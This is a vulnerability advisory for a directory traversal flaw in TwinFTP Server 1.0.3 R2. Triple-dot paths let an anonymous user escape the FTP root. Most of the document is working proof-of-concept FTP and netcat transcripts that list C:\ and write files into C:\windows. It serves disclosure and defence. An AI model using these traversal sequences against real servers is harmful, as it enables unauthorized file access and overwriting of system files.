Directory Traversal Vulnerability in TwinFTP Server allows overwriting of files outside FTP directory

Summary

TwinFTP Server is a FTP server released by Jigunet Corporation for the Windows platform. A vulnerability exists in TwinFTP server that allows a malicious user access to files outside the FTP directory. This vulnerability may also be exploited to bypass directory restrictions enforced by the FTP server to write arbitrary files into directories that the server process has access to.

 
Tested System

TwinFTP Server Standard 1.0.3 R2 (Win32) on English WinXP SP1.
TwinFTP Server Enterprise 1.0.3 R2 (Win32) on English Win2K SP2.

 
Details

A directory traversal vulnerability exists in several FTP commands of TwinFTP that may be exploited by a malicious user to access files outside the FTP directory. The problem lies with the incorrect filtering of directory name supplied to CWD, STOR and RETR commands. Directory traversal is possible when the directory name contains three dots and a forward slash, e.g. ".../winnt".

This vulnerability may be exploited to bypass directory restrictions enforced by the FTP server to write arbitrary files into directories that the server process has access to. This is critical since it may be abused by malicious users to overwrite system files within the Windows directory if the TwinFTP server runs with Administrator privilege.

This vulnerability is illustrated in the following examples. In these examples, the FTP server is configured to allow the anonymous user read-only access to the FTP home directory at C:\ftproot. The annoymous user is not allowed to create files or directories in C:\ftproot.

C:\>ftp 192.168.1.7
Connected to 192.168.1.7.
220 TwinFTP Server Standard 1.0.3 R2 (win32)
User (192.168.1.7:(none)): anonymous
331 Need password.
Password:
230 User logged in, proceed.
ftp> pwd
257 "/" is current directory.
ftp> cd ..
550 CDUP command failure, need account.
ftp> cd ...\windows				Using triple dots ... to change directory to C:\windows
250 Directory changed to ...\windows
ftp> cd ..					
250 CDUP command successfully.				Now we are at C:\
ftp> ls
200 PORT command OK.
150 Opening ASCII mode data connection for /bin/ls
ntldr							Directory listing of C:\
NTDETECT.COM
boot.ini
CONFIG.SYS
AUTOEXEC.BAT
IO.SYS
MSDOS.SYS
pagefile.sys
nessuswx.dbg
_NavCClt.Log
uspscan.cab

226 Data transfer successfully.
ftp: 133 bytes received in 0.01Seconds 13.30Kbytes/sec.
ftp>

C:\>ftp 192.168.1.7
Connected to 192.168.1.7.
220 TwinFTP Server Standard 1.0.3 R2 (win32)
User (192.168.1.7:(none)): anonymous
331 Need password.
Password:
230 User logged in, proceed.
ftp> ls
200 PORT command OK.
150 Opening ASCII mode data connection for /bin/ls
.								Directory listing of C:\ftproot
..
file1.txt

226 Data transfer successfully.
ftp: 20 bytes received in 0.00Seconds 20000.00Kbytes/sec.
ftp> put a.txt
200 PORT command OK.
550 Access denied, command failure.			We are not allowed to write files to c:\ftproot
ftp> cd ...\windows
250 Directory changed to ...\windows
ftp> put a.txt
200 PORT command OK.
150 Opening ASCII mode data connection for a.txt.
226 Data transfer successfully.				Wrote a file to C:\windows
ftp: 6 bytes sent in 0.00Seconds 6000.00Kbytes/sec.
ftp> cd ..\ftproot
250 Directory changed to ..\ftproot			We are now back to C:\ftproot
ftp> put a.txt
200 PORT command OK.
150 Opening ASCII mode data connection for a.txt.
226 Data transfer successfully.				We can now write a file to C:\ftproot
ftp: 6 bytes sent in 0.01Seconds 0.60Kbytes/sec.
ftp> ls
200 PORT command OK.
150 Opening ASCII mode data connection for /bin/ls
file1.txt							Directory listing of C:\ftproot
a.txt

226 Data transfer successfully.
ftp: 20 bytes received in 0.01Seconds 2.00Kbytes/sec.
ftp>

c:\>nc 192.168.1.7 21
220 TwinFTP Server Standard 1.0.3 R2 (win32)
USER anonymous
331 Need password.
PASS 1234
230 User logged in, proceed.
PORT 192,168,1,3,7,209
200 PORT command OK.
STOR ...\a.txt
425 Cannot create data connection.			File of 0 size has been created in C:\